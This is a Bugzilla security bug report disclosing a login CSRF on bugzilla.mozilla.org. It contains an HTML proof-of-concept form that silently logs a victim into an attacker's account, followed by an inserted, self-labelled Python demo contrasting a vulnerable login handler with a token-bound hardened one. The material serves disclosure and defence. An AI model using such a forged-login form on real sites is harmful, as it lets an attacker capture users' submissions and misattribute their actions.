Closed
Bug 963687
Opened 10 years ago
Closed 10 years ago
Switching a user to another account
Categories
(Bugzilla :: User Accounts, defect)
Tracking
RESOLVED
DUPLICATE
of bug 713926
People
(Reporter: dawid, Unassigned)
Details
(Whiteboard: [site:bugzilla.mozilla.org][reporter-external])
User Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS)

Steps to reproduce:

It is possible to log the user in to another account (CSRF attack).

Steps to reproduce: the user logs in to his account and then the following actions are performed:

1. Enter http://bugzilla.mozilla.org/index.cgi?logout=1 to log out the user.
2. Then log the user in to another account.

POC (for demonstration purposes with a Submit button; normally sent automatically):

    <html>
    <body>
    <form action="https://bugzilla.mozilla.org/index.cgi" method="POST">
      <input type="hidden" name="Bugzilla_login" value="E-MAIL_ATTACKER" />
      <input type="hidden" name="Bugzilla_password" value="PASSWORD_ATTACKER" />
      <input type="hidden" name="GoAheadAndLogIn" value="Log in" />
      <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

It is assumed that E-MAIL_ATTACKER with PASSWORD_ATTACKER exists.

There might be different reasons for the attacker to launch this attack. An exemplary one is getting credit/a bounty for a submitted bug (the attacker logs the user into his account; the user thinks that he uses his own account and submits a bug; the action is done from the attacker's account and the credit/bounty goes to the attacker).

Regards,
Dawid Czagan
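The login CSRF this report describes, with its defensive counterpart, as an added Python example that is not code from Bugzilla or from the reporter. It models a login endpoint that accepts bare credentials from any page (the reported behaviour) beside one that first requires a form token bound to a pre-login session cookie, then discards that cookie on success. The in-memory user table, the server key, the `Request`/`Response` classes, `render_login_page`, `login_token_for` and the two `simulate_*` helpers are constructed for this demo.

```python
"""Login-CSRF demo: a login handler that trusts bare credentials beside one
that requires a token bound to a pre-login session cookie.

Added example, not Bugzilla code. The user table, server key and
request/response shapes are constructed for the demo.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed credential store; plaintext only to keep the demo short.
USERS = {
    "victim@example.test": "victim-password",
    "attacker@example.test": "attacker-password",
}
SERVER_KEY = b"constructed-server-key"


@dataclass
class Request:
    cookies: dict  # cookies the browser attaches automatically
    form: dict     # POST body fields


@dataclass
class Response:
    status: int
    body: str
    set_cookies: dict = field(default_factory=dict)


def login_token_for(pre_session: str) -> str:
    """Token = HMAC(server key, pre-login session id). Only the server can
    compute it, and it is only valid for the browser holding that cookie."""
    return hmac.new(SERVER_KEY, pre_session.encode(), hashlib.sha256).hexdigest()


def render_login_page(resp_cookies: dict) -> str:
    """Server side of GET /login: set a pre-login cookie and embed the matching
    token in the form. Returns the token the page would carry."""
    pre_session = secrets.token_urlsafe(16)
    resp_cookies["pre_session"] = pre_session
    return login_token_for(pre_session)


def check_credentials(form: dict):
    email = form.get("Bugzilla_login", "")
    password = form.get("Bugzilla_password", "")
    expected = USERS.get(email)
    if expected is None or not hmac.compare_digest(expected, password):
        return None
    return email


def login_vulnerable(req: Request) -> Response:
    """Accepts any POST carrying valid credentials, whichever page built the
    form. Any browser can be logged into any account whose password the
    form author knows."""
    email = check_credentials(req.form)
    if email is None:
        return Response(401, "invalid login")
    return Response(200, f"logged in as {email}", {"session": f"sess-{email}"})


def login_hardened(req: Request) -> Response:
    """Checks that the form token was minted for this browser's pre-login
    cookie before looking at credentials, then retires that cookie."""
    pre_session = req.cookies.get("pre_session", "")
    token = req.form.get("login_token", "")
    if not pre_session or not hmac.compare_digest(token, login_token_for(pre_session)):
        return Response(403, "login token missing or not bound to this browser")
    email = check_credentials(req.form)
    if email is None:
        return Response(401, "invalid login")
    return Response(200, f"logged in as {email}",
                    {"pre_session": "", "session": f"sess-{email}"})


def simulate_cross_site_login(handler) -> Response:
    """The victim's browser submits a form built by a third-party page. The
    browser attaches the victim's cookies, but the page cannot read them, so
    any token it embeds was minted for a different cookie."""
    victim_cookies = {}
    render_login_page(victim_cookies)                        # victim saw /login earlier
    other_cookies = {}
    foreign_token = render_login_page(other_cookies)         # token for another browser
    forged = Request(cookies=victim_cookies,
                     form={"Bugzilla_login": "attacker@example.test",
                           "Bugzilla_password": "attacker-password",
                           "GoAheadAndLogIn": "Log in",
                           "login_token": foreign_token})
    return handler(forged)


def simulate_legitimate_login(handler) -> Response:
    """Same browser loads /login and submits the form it was given."""
    cookies = {}
    token = render_login_page(cookies)
    req = Request(cookies=cookies,
                  form={"Bugzilla_login": "victim@example.test",
                        "Bugzilla_password": "victim-password",
                        "login_token": token})
    return handler(req)


if __name__ == "__main__":
    print("vulnerable, cross-site:", simulate_cross_site_login(login_vulnerable).status)
    print("hardened, cross-site:  ", simulate_cross_site_login(login_hardened).status)
    print("hardened, legitimate:  ", simulate_legitimate_login(login_hardened).status)
```

The point of the binding is the part that is easy to get wrong: a hidden token that is merely secret is not enough, because the form author can load the login page themselves and copy a valid one. The token has to be tied to a cookie the submitting browser holds and the cross-site page cannot read. Dropping the pre-login cookie and issuing a fresh session id on success keeps a token from being replayed, and marking the cookies SameSite adds a second, browser-enforced layer.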
Updated•10 years ago
Flags: sec-bounty?
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?]
Updated•10 years ago
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Updated•10 years ago
Flags: sec-bounty? → sec-bounty-
Whiteboard: [site:bugzilla.mozilla.org][reporter-external][verif?] → [site:bugzilla.mozilla.org][reporter-external]
Updated•10 years ago
Group: bugzilla-security